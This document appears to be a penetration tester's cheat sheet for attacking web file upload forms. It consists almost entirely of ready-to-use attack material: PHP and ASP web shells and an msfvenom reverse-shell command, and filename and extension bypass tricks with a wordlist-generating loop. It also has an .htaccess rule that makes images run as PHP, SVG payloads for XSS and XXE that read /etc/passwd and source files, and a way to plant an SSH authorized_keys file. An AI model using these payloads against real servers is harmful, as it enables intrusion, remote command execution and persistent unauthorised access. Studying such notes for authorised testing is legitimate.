- When testing a file upload form, we should always determine what happens when a file is uploaded *twice*. If the web application indicates that the *file already exists*, we can use this method to brute force the contents of a web server. - Alternatively, if the web application displays an error message, this may provide valuable information such as the *programming language* or *web technologies* in use. # Web Shells  ```bash # php webshell curl http://$IP/wook/uploads/simple-backdoor.php?cmd=dir # Basic PHP File Read <?php echo file_get_contents('/etc/passwd'); ?> # Basic PHP Command Execution <?php system('hostname'); ?> # Basic PHP WebShell <?php system($_REQUEST['cmd']); ?> # Basic ASP WebShell <% eval request('cmd') %> # Generate PHP reverse shell msfvenom -p php/reverse_php LHOST=<IP> LPORT_<PORT> -f raw > reverse.php # phpbash https://github.com/Arrexel/phpbash # php reverse shell https://github.com/pentestmonkey/php-reverse-shell # seclists web/reverse shells https://github.com/danielmiessler/SecLists/tree/master/Web-Shells ``` # Bypasses  ```bash # Client-Side Bypass Toggle Page Inspector # Blacklist Bypass .phps .phtml, pHp, pHP php7, phar, etc. # PHP extensions https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst # ASP extensions https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP # Web extensions /usr/share/seclists/Discovery/Web-Content/web-extensions.txt # Whitelist Bypass ## Double extension shell.jpg.php # Reverse double extension shell.php.jpg # Character Injection `%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…`, `:` for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do for ext in '.php' '.phps'; do echo "shell$char$ext.jpg" >> wordlist.txt echo "shell$ext$char.jpg" >> wordlist.txt echo "shell.jpg$char$ext" >> wordlist.txt echo "shell.jpg$ext$char" >> wordlist.txt done done # Content/Type Bypass ## List of All Content Types https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt cat web-all-content-types.txt | grep 'image/' > image-content-types.txt # File Signatures / Magic Bytes https://en.wikipedia.org/wiki/List_of_file_signatures ``` # .htaccess  ```bash # uploads 디렉토리에서 .jpg 파일을 PHP로 해석하게 함 AddType application/x-httpd-php .jpg .jpeg .png # 또는 AddHandler application/x-httpd-php .jpg .php .phtml # 또는 <FilesMatch "\.(jpg|jpeg|png)quot;> SetHandler application/x-httpd-php </FilesMatch> ``` # Limited Uploads  ```bash XSS - HTML, JS, SVG, GIF XXE/SSRF - XML, SVG, PDF, PPT, DOC # payload 1 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1"> <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" /> <script type="text/javascript">alert(window.origin);</script> </svg> # payload 2 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg>&xxe;</svg> # payload 3 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> <svg>&xxe;</svg> DoS - ZIP, JPG, PNG ``` # Upload + Directory traversal ![[Pasted image 20251202215758.png]]![[Pasted image 20251202215801.png]] # File Upload private key ``` kali@kali:~$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in fileup Your public key has been saved in fileup.pub ... kali@kali:~$ cat fileup.pub > authorized_keys ``` ![[Pasted image 20251202222118.png]]